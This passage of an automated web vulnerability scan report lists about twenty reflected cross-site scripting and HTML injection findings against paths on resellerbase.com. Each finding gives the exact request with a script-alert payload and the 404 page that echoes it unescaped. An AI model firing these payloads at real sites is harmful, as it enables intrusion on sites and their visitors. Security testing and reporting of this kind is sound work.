GET /detail/45/search.phpbd643<script>alert(1)</script>ca4097650ae?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.phpbd643<script>alert(1)</script>ca4097650ae?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3187. http://www.resellerbase.com/detail/45/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd4d0<a>1ecd127aa72 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/search.php?keyword=search...&Submit3=Searchbd4d0<a>1ecd127aa72&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...&Submit3=Searchbd4d0<a>1ecd127aa72&opt=2 was not found on this server.</p>
...[SNIP]...

2.3188. http://www.resellerbase.com/detail/45/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a4061<a>50281836e8d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/search.php?keyword=search...a4061<a>50281836e8d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...a4061<a>50281836e8d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3189. http://www.resellerbase.com/detail/45/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload afc0c<script>alert(1)</script>78c07d510a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/search.php?keyword=search...&Submit3=Search&opt=2&afc0c<script>alert(1)</script>78c07d510a5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...&Submit3=Search&opt=2&afc0c<script>alert(1)</script>78c07d510a5=1 was not found on this server.</p>
...[SNIP]...

2.3190. http://www.resellerbase.com/detail/45/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8ebdf<a>159d085e985 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/search.php?keyword=search...&Submit3=Search&opt=28ebdf<a>159d085e985 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...&Submit3=Search&opt=28ebdf<a>159d085e985 was not found on this server.</p>
...[SNIP]...

2.3191. http://www.resellerbase.com/detail/45/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f677<script>alert(1)</script>cf499dcc7c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f677<script>alert(1)</script>cf499dcc7c0/45/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f677<script>alert(1)</script>cf499dcc7c0/45/themes/ was not found on this server.</p>
...[SNIP]...

2.3192. http://www.resellerbase.com/detail/45/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cb55<script>alert(1)</script>88ab8af5063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/459cb55<script>alert(1)</script>88ab8af5063/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/459cb55<script>alert(1)</script>88ab8af5063/themes/ was not found on this server.</p>
...[SNIP]...

2.3193. http://www.resellerbase.com/detail/45/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e858<script>alert(1)</script>d0ac9895548 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes9e858<script>alert(1)</script>d0ac9895548/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes9e858<script>alert(1)</script>d0ac9895548/ was not found on this server.</p>
...[SNIP]...

2.3194. http://www.resellerbase.com/detail/45/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57045<script>alert(1)</script>3b2e4c45dd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/?57045<script>alert(1)</script>3b2e4c45dd9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/?57045<script>alert(1)</script>3b2e4c45dd9=1 was not found on this server.</p>
...[SNIP]...

2.3195. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36841<script>alert(1)</script>a261b45a654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail36841<script>alert(1)</script>a261b45a654/45/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail36841<script>alert(1)</script>a261b45a654/45/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3196. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66bde<script>alert(1)</script>60bf6cc565b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4566bde<script>alert(1)</script>60bf6cc565b/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4566bde<script>alert(1)</script>60bf6cc565b/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3197. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5ae08<script>alert(1)</script>e2db34b963e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes5ae08<script>alert(1)</script>e2db34b963e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes5ae08<script>alert(1)</script>e2db34b963e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3198. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 196d0<script>alert(1)</script>e3ee35fc8c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos196d0<script>alert(1)</script>e3ee35fc8c7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos196d0<script>alert(1)</script>e3ee35fc8c7/ was not found on this server.</p>
...[SNIP]...

2.3199. http://www.resellerbase.com/detail/45/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57db0<script>alert(1)</script>60659e1ffaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/?57db0<script>alert(1)</script>60659e1ffaa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/?57db0<script>alert(1)</script>60659e1ffaa=1 was not found on this server.</p>
...[SNIP]...

2.3200. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 141ac<script>alert(1)</script>5091caf4c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail141ac<script>alert(1)</script>5091caf4c65/45/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail141ac<script>alert(1)</script>5091caf4c65/45/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3201. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b62<script>alert(1)</script>f3f84b63653 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4580b62<script>alert(1)</script>f3f84b63653/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4580b62<script>alert(1)</script>f3f84b63653/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3202. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81aa7<script>alert(1)</script>14462a464e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes81aa7<script>alert(1)</script>14462a464e9/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes81aa7<script>alert(1)</script>14462a464e9/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3203. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3095a<script>alert(1)</script>1499c7c4649 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos3095a<script>alert(1)</script>1499c7c4649/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos3095a<script>alert(1)</script>1499c7c4649/images/ was not found on this server.</p>
...[SNIP]...

2.3204. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 44eb0<script>alert(1)</script>610ee297568 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images44eb0<script>alert(1)</script>610ee297568/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images44eb0<script>alert(1)</script>610ee297568/ was not found on this server.</p>
...[SNIP]...

2.3205. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d98fe<script>alert(1)</script>eddf6cef65b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/?d98fe<script>alert(1)</script>eddf6cef65b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
